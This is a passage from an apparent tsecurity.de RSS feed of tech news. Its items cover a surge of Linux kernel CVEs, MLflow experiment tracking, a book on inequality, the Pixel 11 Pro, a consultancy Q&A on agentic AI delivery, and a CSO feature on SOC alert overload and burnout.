<title><![CDATA[Linux Kernel Published 440 Security Advisories— In 24hrs Here’s Why]]></title>
<description><![CDATA[Official linux-cve-announce mailing list published 440 Common Vulnerabilities and Exposures (CVEs) in less than 24 hours. Hundreds of… The post Linux Kernel Published 440 Security Advisories— In 24hrs Here’s Why appeared first on Hackers Online Club. This article has been…
Read more →
The post Li...]]></description>
<link>https://tsecurity.de/de/3684852/it-security-nachrichten/linux-kernel-published-440-security-advisories-in-24hrs-heres-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684852/it-security-nachrichten/linux-kernel-published-440-security-advisories-in-24hrs-heres-why/</guid>
<pubDate>Tue, 21 Jul 2026 23:04:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Official linux-cve-announce mailing list published 440 Common Vulnerabilities and Exposures (CVEs) in less than 24 hours. Hundreds of… The post Linux Kernel Published 440 Security Advisories— In 24hrs Here’s Why appeared first on Hackers Online Club. This article has been…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/linux-kernel-published-440-security-advisories-in-24hrs-heres-why/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/linux-kernel-published-440-security-advisories-in-24hrs-heres-why/">Linux Kernel Published 440 Security Advisories— In 24hrs Here’s Why</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are Your ML Experiments a Mess? Here’s the Fix]]></title>
<description><![CDATA[A hands-on guide to tracking experiments, logging models, and reproducing results with ML Flow.
The post Are Your ML Experiments a Mess? Here’s the Fix appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3683614/ai-nachrichten/are-your-ml-experiments-a-mess-heres-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683614/ai-nachrichten/are-your-ml-experiments-a-mess-heres-the-fix/</guid>
<pubDate>Tue, 21 Jul 2026 14:05:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A hands-on guide to tracking experiments, logging models, and reproducing results with ML Flow.</p>
<p>The post <a href="https://towardsdatascience.com/your-ml-experiments-are-a-mess-heres-the-fix/">Are Your ML Experiments a Mess? Here’s the Fix</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Social Darwinists to tech bros: tracing the long fight against equality in US]]></title>
<description><![CDATA[Historian Kim Phillips-Fein’s book Country of Lords looks back at the many men who have tried to fight against egalitarianism, from John Adams to Peter ThielThe historian Kim Phillips-Fein’s new book is published amid celebrations of the 250th anniversary of the declaration of independence and it...]]></description>
<link>https://tsecurity.de/de/3683355/it-nachrichten/social-darwinists-to-tech-bros-tracing-the-long-fight-against-equality-in-us/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683355/it-nachrichten/social-darwinists-to-tech-bros-tracing-the-long-fight-against-equality-in-us/</guid>
<pubDate>Tue, 21 Jul 2026 12:17:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Historian Kim Phillips-Fein’s book Country of Lords looks back at the many men who have tried to fight against egalitarianism, from John Adams to Peter Thiel</p><p>The historian Kim Phillips-Fein’s new book is published amid celebrations of the <a href="https://www.theguardian.com/us-news/series/america-at-250">250th anniversary</a> of the declaration of independence and its truth “self-evident, that all men are created equal”. Country of Lords, however, is a history of Neo-Aristocrats, Social Darwinists, Tech Utopians, and the Long Fight <em>Against</em> Equality in America.</p><p>Concise and hard-hitting, the book arrives at a time of glaring social and <a href="https://www.theguardian.com/us-news/2026/jun/26/billionaires-wealth-soars-as-workers-struggle">economic</a> <a href="https://www.theguardian.com/us-news/2026/jun/21/us-inequality-plutocracy">inequality</a>, Phillips-Fein seeing <a href="https://www.theguardian.com/technology/elon-musk">Elon Musk</a> “<a href="https://www.theguardian.com/commentisfree/2026/jun/17/is-it-bad-that-elon-musk-has-a-trillion-dollars-yes-and-heres-why">emerging as a trillionaire</a> very much on people’s minds, with a deep level of discomfort, both fear and anger about what this portends”.</p> <a href="https://www.theguardian.com/books/2026/jul/21/kim-phillips-fein-country-of-lords">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s an Official Pixel 11 Pro From Google]]></title>
<description><![CDATA[Should you have had any doubt about last week’s accidental Pixel 11 series reveal, we can confirm that at least one of those devices was indeed the real deal. Google has confirmed the design of the Pixel 11 Pro today through Google Fi. The image at the top of this post is of the Pixel...
Read the...]]></description>
<link>https://tsecurity.de/de/3681419/it-nachrichten/heres-an-official-pixel-11-pro-from-google/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681419/it-nachrichten/heres-an-official-pixel-11-pro-from-google/</guid>
<pubDate>Mon, 20 Jul 2026 16:48:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Should you have had any doubt about last week’s accidental Pixel 11 series reveal, we can confirm that at least one of those devices was indeed the real deal. Google has confirmed the design of the Pixel 11 Pro today through Google Fi. The image at the top of this post is of the Pixel...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/20/heres-an-official-pixel-11-pro-from-google/">Here’s an Official Pixel 11 Pro From Google</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Why boutique consultancies might be better for AI rollouts than the bigwigs]]></title>
<description><![CDATA[Major AI labs are unleashing forward-deployed engineers (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.



But smaller firms are in the mix now, as well. AI is helping 28Stone Con...]]></description>
<link>https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680996/it-nachrichten/qa-why-boutique-consultancies-might-be-better-for-ai-rollouts-than-the-bigwigs/</guid>
<pubDate>Mon, 20 Jul 2026 13:33:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Major AI labs are <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">unleashing forward-deployed engineers</a> (FDEs) to try and grab enterprise customers. Large consultancies are dishing out tokens and assembling armies of consultants — both human and agent — to do the same.</p>



<p class="wp-block-paragraph">But smaller firms are in the mix now, as well. AI is helping <a href="https://www.28stone.com/" target="_blank" rel="noreferrer noopener">28Stone Consulting</a>, a New York-based, 230-person technology consultancy for capital markets, punch above its weight against larger rivals in the <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html">rush to deliver FDEs</a>.</p>



<p class="wp-block-paragraph">In this Q&amp;A, <a href="https://www.linkedin.com/in/thomas-dolan-4124914" target="_blank" rel="noreferrer noopener">Thomas Dolan</a> and <a href="https://www.linkedin.com/in/frank-erickson-07675a1" target="_blank" rel="noreferrer noopener">Frank Erickson</a>, founders of 28Stone, argue that agentic AI isn’t a one-size-fits-all solution in vertical markets; success takes discipline, deep domain expertise, and human involvement to mitigate risk.</p>



<p class="wp-block-paragraph">Many enterprises continue to struggle with the use of AI agents, which is consultancies are stepping in to get projects off the ground. 28Stone is among those that have published blueprints and methodologies on the development and delivery of agentic AI workflows with humans in the loop.</p>



<p class="wp-block-paragraph"><em>Computerworld</em> spoke with both founding partners about why companies are still stumbling with <a href="https://www.computerworld.com/article/4083589/from-chatbots-to-colleagues-how-agentic-ai-is-redefining-enterprise-automation.html">agentic AI rollouts</a>, and what a disciplined delivery process actually looks like.</p>



<p class="wp-block-paragraph"><strong>After 15 years of delivering software for capital markets firms, is ‘AI-first’ a real distinction or just positioning?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re not shying away from being AI-forward. What needs to shine through is AI done intelligently — not stuff you get by buying some tokens for somebody on the trading desk. We’re an AI-first firm.”</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And it’s temporary. At some point, AI is going to be synonymous with software development.</p>



<p class="wp-block-paragraph">“The whole idea of an AI SDLC (software development lifecycle) versus an SDLC is going to be one and the same, a lot like cloud computing today. To not include AI in your strategy, you’d look like a COBOL vendor.”</p>



<p class="wp-block-paragraph"><strong>What does agentic AI delivery look like?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’ve got several AI initiatives delivering a pure agentic approach. We’ve doubled down on the human expertise wrapper in the SDLC. That doesn’t mean sacrificing any of the benefits of the AI models — quite the opposite.</p>



<p class="wp-block-paragraph">“You don’t achieve anywhere near the same level of value from applying AI without keeping that expertise — industry, functional and technical — throughout the process.”</p>



<p class="wp-block-paragraph"><strong>Where do humans stay in the loop once agents are doing the work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “We’re believers in starting with requirements discovery. Someone who knows the analytical nuances of a good business analyst is critically important; shaping a product owner’s business information through a markup file that can be fed into a BA agent, then treating the output as if it came from a very fast junior BA. Only then is the story complete.</p>



<p class="wp-block-paragraph">“The developer takes that story, transforms it into the most efficient input, then owns the output, because they’re accountable for that code. A developer should own the code on both the input and output side.</p>



<p class="wp-block-paragraph">“Your product owner, who knows the business, that’s great. But expecting them to interact with an agent and output enterprise code is ridiculous. It’s not a great plan.“</p>



<p class="wp-block-paragraph"><strong>Why not just put one do-everything person in charge of AI and agents?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “Every analyst, programmer or software engineer isn’t a great requirements analyst. And a great domain analyst with some technical background won’t know if the agent’s code is garbage, maintainable, performant.</p>



<p class="wp-block-paragraph">“It’s unrealistic to expect one individual to have that breadth across domain, software engineering, testing, deployment. Clients ask all the time, and we push back: ‘Great, if you can find that guy, they’re few and far between.’ To deliver at the enterprise level, you need the human expertise, at depth.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “There’s system speed and latency, important in parts of finance. Then there’s speed of delivery, because other areas evolve quickly and time-to-market is critical.</p>



<p class="wp-block-paragraph">“Our human wrapper may at first pass come across as a little slowed down. Maybe it is. But [Erickson] has a good analogy about one of the dangers of AI: you can end up going really fast in the wrong direction. By the time you look up, you’re way off base and have to backtrack.“</p>



<p class="wp-block-paragraph"><strong>What about AI in your sector do you think is overhyped?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “The hype around the ease of use of AI and the democratization of enterprise software delivery — that ‘anybody could do it now, it’s all being done by machines’ — is another idea that could prove costly in the long run.</p>



<p class="wp-block-paragraph">“This do-it-yourself reaction is dangerous for clients, and for trust in the overall AI benefit, which is real. We compare it to the beginning of offshoring 20, 30 years ago: a golden idea that was going to cure everything. A lot of firms did it thoughtlessly, thinking it’s just labor arbitrage, and it almost inevitably failed. That all-or-nothing mentality missed that offshoring is an amazing way of getting better value for your dollar, but it has to be done thoughtfully, so the delivery process — the thing that ties it all together — stays unsevered.</p>



<p class="wp-block-paragraph">“We’re seeing that now. I’ve heard, ‘We’ll just push a button, the machine’s building the system.’ The machine is not building the system. It might be writing the code, the story, running the tests.</p>



<p class="wp-block-paragraph">The system is built by a team of engineers you bring in and trust. My fear is that people will say, ‘We don’t need this vendor or this technology team. I’ve got a product team. They might not be able to code at all, but they know the business,’ and it fails dramatically. </p>



<p class="wp-block-paragraph">“Then people say, ‘We played with AI, it’s not ready yet,’ and throw it all away. One of the best things we can do is ensure clients know the benefit is real.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “The hype can be summed up in a single phrase: <a href="https://www.computerworld.com/article/4022711/when-everything-is-vibing.html">vibe coding</a>. That has done AI a massive disservice, because there’s a huge difference between vibe coding and enterprise software development, and some of the loudest proponents of AI are too latched on to it. In our industry, the only way to succeed would be a stable of unicorns. It just doesn’t scale. I get perturbed when our people internally refer to AI tooling as vibe coding; if they think that’s what they’re doing, they’re misunderstood.“</p>



<p class="wp-block-paragraph"><strong>When you engage clients at different levels of AI maturity, how do you get them to a understand what works?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “95% of our take on an agentic approach is in line with everyone else’s, but that 5% matters, especially in requirements discovery, in who’s giving the requirements and how they’re thought of. It can set you up for dramatic errors, given the speed at which you’re moving.</p>



<p class="wp-block-paragraph">“There’s a dangerous human tendency we’re seeing among clients to try and cut corners at the start of a project and — in lieu of having deep, expert driven discovery sessions — just summarize what they may want using AI.</p>



<p class="wp-block-paragraph">“We would hope our clients are collaborative, everyone understanding it’s early days. If a client insists on doing something we feel strongly against, like a product owner completely owning everything right up to code generation, that’s an issue we have to either push back strongly on or step out of the accountability for.“</p>



<p class="wp-block-paragraph"><strong>AI body shops — LLM providers and giant consultancies — are emerging to help enterprises deploy AI. Does that model work?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Whether you’re partnering with an LLM or with an AI-first, generic software provider — ‘Hey, we’re not industry guys, but we know AI delivery’ — you end up, if you’re a bank or a broker-dealer, saying: ‘All right, we know our business, these guys know the AI side of it. What could go wrong? Put us together and we’ll have quality engineering.’</p>



<p class="wp-block-paragraph">“The problem is what you miss: the know-how of putting industry and technical expertise together and actually delivering financial services systems. The people working at the generic delivery firms, whether an AI-only firm or a body shop somewhere, don’t have that capability.“</p>



<p class="wp-block-paragraph"><strong>Does AI change the economics for smaller consultancies like yours competing against the big firms, and does it cut both ways?</strong></p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “Over our 15 years pre-AI, there were two recurring reasons we’d lose a project. One: ‘We’d love to work with you guys, given your subject matter expertise, but the costs just aren’t there compared to my budgets. I’m being forced to go to a body shop or an [offshore] delivery center.’ The other side of that coin: ‘We love your capabilities, but you’re a firm of 230 people and I need 300, 400 people.’</p>



<p class="wp-block-paragraph">“AI changes the options for clients. You don’t have to sacrifice the niche vendor who knows your space just because you need a larger team or a cost target. AI levels the playing field and should allow smaller firms to compete with the larger, big-box generic firms, the Accentures of the world.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “It redefines what scale means. You can look at velocity as a measure of your cost to deliver, not a rate card. Scale can’t be defined in terms of headcount anymore. It’s got to be defined in terms of output.</p>



<p class="wp-block-paragraph">“There’s a threat in it, too. If you’re an Accenture with hundreds of thousands of low-cost software engineers, how do you train all those people? I feel for them. But for us, a couple hundred people with a specific domain focus, it’s a huge opportunity.“</p>



<p class="wp-block-paragraph"><strong>How has the profile of the people you and others hire changed with this agentic process?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “You’re still looking for people with strong engineering and design backgrounds, and communication skills, because they interact across the software development lifecycle more than in the past.</p>



<p class="wp-block-paragraph">“Many take too much joy in typing out perfect code. Sorry, I don’t need you writing for-loops and classes anymore. I need you reviewing them, understanding them, operating at a higher level. That’s a different kind of person: an engineer, not a programmer or a coder. On the [business analyst] side it’s similar: people took great pride in detailed user stories covering every path. Now it’s conversations, prompts, reviewing output — less doing, more interacting.</p>



<p class="wp-block-paragraph">“More than ever, they have to be interested in the domain. They can’t just be, ‘I want to learn everything there is to know about Java.’ That’s too narrow. They don’t have to be an expert; they have to be interested. In our case, capital markets is a specific niche. The biggest challenge is getting familiar with the tools — finding time, while delivering for customers, to ramp up and make the mistakes you need to without jeopardizing projects.“</p>



<p class="wp-block-paragraph"><strong>What about governance? Who’s keeping AI delivery and its costs under control?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “This is evolving rapidly. People aren’t sure how to put governance around this. The most obvious is financial governance. People are starting to get hefty bills. One of our clients spent a million dollars on tokens over the last eight weeks alone. Sticker shock. The token-maxing policies are starting to show their flaws. It’s wild west still: learn on the fly, then figure out what needs to be governed.“</p>



<p class="wp-block-paragraph"><strong>Are CIOs actually opening their wallets? And when they do, what’s the smarter way to invest?</strong></p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “There’s still a lot of caution. Forecasts keep going down on how long something should take. So: ‘I could wait three months and maybe still get it delivered by the same date someone’s promising me now, but for half the price. I’m going to wait and see when equilibrium is met.’ We haven’t seen the wallets open up like crazy — it’s slow adoption.“</p>



<p class="wp-block-paragraph"><strong>Dolan:</strong> “One of our clients is looking at it from a productivity-boost perspective: instead of doing the same for less, I can do much more for the same. AI lets clients pull the trigger on things they wouldn’t have in the past — projects that might not have been approved pre-AI, where the costs have come down to a point that’s palatable with the business.“</p>



<p class="wp-block-paragraph"><strong>Erickson:</strong> “And that’s the story we’re hoping to hear more of. There isn’t a huge cost anymore to exploring a business opportunity. The time and money that would have gone to a return-on-investment study could be spent on a proof-of-concept with AI, and the project done a few weeks later. Maybe [there’s] a hint of things to come, where decisions start being made quicker. </p>



<p class="wp-block-paragraph">“There’s a little fear on our side, though: a lot of tiny little projects is tough for a consulting business.“</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SOCs face a human challenge as AI speeds alerts and threats]]></title>
<description><![CDATA[Security operations centers (SOCs) have spent years struggling under the weight of growing alert volumes, expanding attack surfaces, and chronic staffing shortages. Now artificial intelligence is adding a new complication: not just more information, but more machine-generated information that mus...]]></description>
<link>https://tsecurity.de/de/3680465/it-security-nachrichten/socs-face-a-human-challenge-as-ai-speeds-alerts-and-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680465/it-security-nachrichten/socs-face-a-human-challenge-as-ai-speeds-alerts-and-threats/</guid>
<pubDate>Mon, 20 Jul 2026 09:08:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/3840447/security-operations-centers-are-fundamental-to-cybersecurity-heres-how-to-build-one.html">Security operations centers (SOCs)</a> have spent years struggling under the weight of growing alert volumes, expanding attack surfaces, and chronic staffing shortages. Now artificial intelligence is adding a new complication: not just more information, but more machine-generated information that must itself be evaluated.</p>



<p class="wp-block-paragraph">“There is an asymmetry here because you now have to parse through a lot of AI slop to get to, ‘Okay, is this real or not?’” <a href="https://www.linkedin.com/in/fsmontenegro/">Fernando Montenegro</a>, vice president and practice lead at The Futurum Group, tells CSO.</p>



<p class="wp-block-paragraph">His observation captures a growing concern among security leaders. AI is helping attackers and defenders move faster, but it is also creating <a href="https://www.cio.com/article/4077448/ai-workslop-the-new-productivity-killer-only-training-can-stop.html">new forms of cognitive burden</a> for the humans tasked with separating signal from noise.</p>



<p class="wp-block-paragraph">As <a href="https://www.csoonline.com/article/4155342/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html">AI accelerates vulnerability discovery</a> and enables more automated reconnaissance and exploitation, defenders are increasingly responsible for overseeing systems whose outputs can be difficult to interpret or verify. The challenge is not simply more work. It is that the volume, speed, and complexity of that work are increasing simultaneously.</p>



<p class="wp-block-paragraph">Yet experts who study and advise SOCs reject the idea that collapse is inevitable. Instead, they describe an industry entering a difficult transition that could reshape how security teams operate and how humans and machines share responsibility for defense.</p>



<h2 class="wp-block-heading">The vulnerability surge is exposing years of security debt</h2>



<p class="wp-block-paragraph">One of the most immediate concerns is the possibility that <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html">AI dramatically increases the number of vulnerabilities</a> organizations must identify and remediate.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/christopher-crowley-1200339/">Chris Crowley</a>, a longtime cybersecurity instructor and SOC expert, argues that organizations are facing the <a href="https://www.csoonline.com/article/570851/7-ways-technical-debt-increases-security-risk.html">consequences of years of accumulated technology debt</a>.</p>



<p class="wp-block-paragraph">“A lot of what we’re going to have to account for in the next couple of years is a technology debt of vulnerable software that has been deployed because it’s good enough to solve the problem, but then there are all these latent cyber issues, flaws, vulnerabilities that weren’t discovered prior to deployment,” he tells CSO.</p>



<p class="wp-block-paragraph">AI-assisted vulnerability discovery has the potential to expose those weaknesses at a pace defenders have never experienced before.</p>



<p class="wp-block-paragraph">“The compression of work that is being dropped on us is unprecedented,” Crowley says. “We’ve just been ignoring it for decades.”</p>



<p class="wp-block-paragraph">He does not believe AI will necessarily create entirely new classes of vulnerabilities. Instead, he expects defenders to confront much larger volumes of familiar problems.</p>



<p class="wp-block-paragraph">“We’re going to have 100 of these simultaneously,” he says, referring to the kinds of high-priority vulnerabilities security teams traditionally handle one at a time.</p>



<p class="wp-block-paragraph">The AI challenge for many SOCs may be less a novelty problem than a volume problem. Security teams already know how to patch systems, prioritize remediation, and respond to critical exposures. What changes is the scale and speed at which those demands arrive.</p>



<p class="wp-block-paragraph">Organizations with mature patching, prioritization, escalation, and response processes may struggle but adapt. Organizations that have treated security operations as a bare-minimum compliance function may find themselves overwhelmed.</p>



<p class="wp-block-paragraph">For CISOs, Crowley says, that means treating “patch now” less as an occasional emergency state and <a href="https://www.csoonline.com/article/4196435/flaw-surge-fuels-need-for-cisos-to-rethink-vulnerability-management.html">more as a permanent operating posture</a>. As AI accelerates vulnerability discovery, the distinction between routine maintenance and crisis response may continue to blur.</p>



<p class="wp-block-paragraph">He compares the situation to disaster recovery planning. Organizations that wait until a crisis arrives to establish staffing plans, escalation paths, and remediation processes may discover there is not enough help available.</p>



<h2 class="wp-block-heading">Cognitive overload may become the defining challenge</h2>



<p class="wp-block-paragraph">While vulnerability discovery receives much of the attention, Montenegro believes security leaders need a broader framework for understanding AI’s impact.</p>



<p class="wp-block-paragraph">Organizations should think about AI through three lenses, he says: security for AI, AI for security, and security from AI. The first involves protecting AI systems. The second involves using AI to improve defensive operations. The third asks what happens when adversaries use AI against the organization.</p>



<p class="wp-block-paragraph">For SOCs, all three categories are beginning to overlap.</p>



<p class="wp-block-paragraph">As AI makes it easier to create reports, assessments, vulnerability submissions, and other operational artifacts, humans remain responsible for determining whether that information is accurate and useful.</p>



<p class="wp-block-paragraph">“It becomes much easier to generate content,” Montenegro says, “but if you’re going to review that content as a human, the onus on you now is that much larger.”</p>



<p class="wp-block-paragraph">The result is a new form of cognitive overload. Security professionals may spend increasing amounts of time evaluating machine-generated information instead of conducting higher-value security work.</p>



<p class="wp-block-paragraph">Organizations can increasingly use AI to summarize reports, evaluate alerts, and assist with investigations, but humans remain responsible for validating the results.</p>



<p class="wp-block-paragraph">“We’re not at the stage yet where people are comfortable” handing off critical decisions entirely to AI, he says.</p>



<p class="wp-block-paragraph">That leaves defenders caught between two competing realities: AI is creating more information to process, but AI is also becoming one of the few viable tools for managing that growing workload.</p>



<p class="wp-block-paragraph">For Montenegro, the principle should be to automate tasks, not roles. AI can absorb repetitive investigative steps, but organizations should be cautious about removing humans from the process entirely.</p>



<p class="wp-block-paragraph">The risk, he says, is that if organizations hide too much complexity behind automated outputs, analysts may lose opportunities to develop the domain knowledge needed to advance.</p>



<p class="wp-block-paragraph">“How is that professional who is reacting to those alerts growing as a professional?” he says.</p>



<h2 class="wp-block-heading">The gap between mature and struggling SOCs may widen</h2>



<p class="wp-block-paragraph">Not every organization will experience the impact of AI in the same way.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/johnlhubbard/">John Hubbard</a>, senior cybersecurity consultant and SANS instructor, believes the industry’s response will largely depend on how well organizations have prepared for operational stress before AI arrives at scale.</p>



<p class="wp-block-paragraph">“I would roughly break security operations teams into two camps,” Hubbard tells CSO. “There are the ones that are definitely struggling, are already overwhelmed. And then some are doing really well.”</p>



<p class="wp-block-paragraph">The struggling organizations tend to be understaffed, underfunded, undertrained, or dependent on ad hoc processes. Every incident feels different, forcing teams to improvise under pressure.</p>



<p class="wp-block-paragraph">“Getting hit with something like this can certainly be an accelerant for burnout if they weren’t already experiencing it,” Hubbard says.</p>



<p class="wp-block-paragraph">By contrast, mature security teams have already invested in processes, training, exercises, and automation. “The teams that are doing a really solid job now are probably not super overwhelmed because they’ve developed the processes and procedures to be ready for this kind of thing,” Hubbard says.</p>



<p class="wp-block-paragraph">He compares successful SOCs to fire departments. Firefighters cannot predict exactly where the next emergency will occur, but they know how to respond because they have rehearsed those responses repeatedly.</p>



<p class="wp-block-paragraph">“The teams that kind of can react like a fire department are the ones that are getting it right,” he says.</p>



<p class="wp-block-paragraph">Those organizations <a href="https://www.csoonline.com/article/570871/tabletop-exercises-explained-definition-examples-and-objectives.html">conduct tabletop exercises</a>, adversary emulation exercises, <a href="https://www.csoonline.com/article/571891/red-vs-blue-vs-purple-teams-how-to-run-an-effective-exercise.html">red-team assessments</a>, and <a href="https://www.csoonline.com/article/3829684/how-to-create-an-effective-incident-response-plan.html">incident response</a> drills. As a result, they can absorb additional workload without descending into panic.</p>



<h2 class="wp-block-heading">Burnout remains the industry’s most difficult problem</h2>



<p class="wp-block-paragraph">Despite widespread concern about AI-enabled attacks, none of the experts view AI solely as a threat. Several argue that AI will become essential for helping defenders cope with the challenges it creates.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jose-marie-griffiths-9106b7b/">Jose-Marie Griffiths</a>, president emerita and former CIO of Dakota State University, believes AI can help security teams sift through overwhelming volumes of information and identify the signals that matter most.</p>



<p class="wp-block-paragraph">“People who work in SOCs are now seeing overwhelming volumes of data, and they’re getting fatigued,” Griffiths tells CSO.</p>



<p class="wp-block-paragraph">AI can help automate portions of analysis, validate alerts, and improve visibility into complex environments. But Griffiths cautions that some AI-assisted vulnerability discovery tools are also producing large numbers of false positives.</p>



<p class="wp-block-paragraph">That matters because false positives do not eliminate work. They create it. As organizations confront escalating volumes of findings, distinguishing genuine risk from erroneous results may become as important as discovering vulnerabilities in the first place.</p>



<p class="wp-block-paragraph">The experts agree that technology alone will not determine outcomes. People will.</p>



<p class="wp-block-paragraph">Crowley argues that cybersecurity professionals must recognize that uncertainty is intrinsic to the profession. “We are the group that deals with uncertainty,” he says. “That’s really and truly what cybersecurity is.”</p>



<p class="wp-block-paragraph">That reality places responsibility on both individuals and organizations. Analysts need mechanisms for managing stress. Teams need to recognize when colleagues are approaching their limits. Managers need to <a href="https://www.csoonline.com/article/3631614/cybersecurity-is-tough-4-steps-leaders-can-take-now-to-reduce-team-burnout.html">establish healthy escalation practices and realistic expectations</a>.</p>



<p class="wp-block-paragraph">Hubbard rejects the notion that burnout is inevitable.</p>



<p class="wp-block-paragraph">“It is not a foregone conclusion that security operations jobs have to be a painful grind that everyone hates,” he says.</p>



<p class="wp-block-paragraph">He has seen organizations where employees remain engaged for years because leaders actively manage workload, create supportive cultures, and encourage open communication.</p>



<p class="wp-block-paragraph">That includes making it safe for analysts to admit when they have reached their limits. “If people are unwilling to say, ‘I’m maxed out right now, and I’m going crazy,’ that’s going to be the thing that breaks a lot of teams,” Hubbard says.</p>



<p class="wp-block-paragraph">Pay alone may not solve the problem. Crowley pointed to SANS/SOC <a href="https://www.sans.org/white-papers/2026-sans-soc-survey-insights-decade-evolution-cyber-defense">survey findings</a> showing that compensation ranked fourth among retention factors, behind meaningful work, training, and professional development.</p>



<h2 class="wp-block-heading">The future SOC may look very different</h2>



<p class="wp-block-paragraph">Griffiths believes organizations will need to respond not only with better technology but with structural changes. Traditional tiered SOC models may need to evolve into more collaborative teams with diverse expertise working together in real-time.</p>



<p class="wp-block-paragraph">“I think we’re going to have to eliminate the hierarchies a little bit and have teams of people with different expertise working together,” she says.</p>



<p class="wp-block-paragraph">She also argues that organizations should invest in human expertise rather than simply increasing AI consumption. “Buy engineers, not tokens,” she says.</p>



<p class="wp-block-paragraph">Professional networks and peer support will matter as much as any tool, Griffiths says, because defenders need trusted communities where they can compare notes, share practices, and avoid facing sustained pressure in isolation.</p>



<p class="wp-block-paragraph">If there is a consensus emerging among experts, it is that AI is exposing weaknesses that already existed.</p>



<p class="wp-block-paragraph">The staffing shortages, alert fatigue, burnout, and process failures affecting SOCs did not begin with generative AI. AI is simply amplifying them.</p>



<p class="wp-block-paragraph">At the same time, AI is providing new tools that may help organizations manage those very challenges.</p>



<p class="wp-block-paragraph">The future SOC may spend less time manually triaging alerts and more time validating automated findings, conducting threat hunting, and making strategic decisions. Human expertise may increasingly be paired with AI systems that act as operational partners.</p>



<p class="wp-block-paragraph">The transition will not be painless. Some teams will struggle. Some practitioners may leave the field. Others will adapt and thrive.</p>



<p class="wp-block-paragraph">“In a way,” Griffiths says, “we’re turning the whole SOC inside out.”</p>



<p class="wp-block-paragraph">Montenegro sees the transition as a cybersecurity version of the Red Queen effect: defenders and attackers must keep running simply to stay in place.</p>



<p class="wp-block-paragraph">Borrowing from science-fiction author William Gibson, Montenegro offered perhaps the simplest description of the industry’s current moment: “The future is already here. It’s just unevenly distributed.”</p>



<p class="wp-block-paragraph">For security leaders, that future is arriving in the form of AI-generated vulnerabilities, AI-assisted investigations, and AI-enabled adversaries. The question is no longer whether security operations centers will change. It is whether organizations can adapt quickly enough to keep pace.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 660]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3672376/tools/this-week-in-rust-this-week-in-rust-660/</link>
